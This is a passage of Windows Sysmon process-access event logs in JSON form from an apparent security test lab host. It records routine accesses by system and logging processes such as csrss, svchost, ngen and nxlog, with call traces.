C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:20.635","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1304-5F25-0000-00107EB40A00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:20.635\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1304-5F25-0000-00107EB40A00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:20.635","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1304-5F25-0000-00107EB40A00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:20.635\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1304-5F25-0000-00107EB40A00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:20.635","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1304-5F25-0000-00107EB40A00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:21.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:21.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:22.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:22.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:23.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:23.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:24.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:24.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:25.604\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 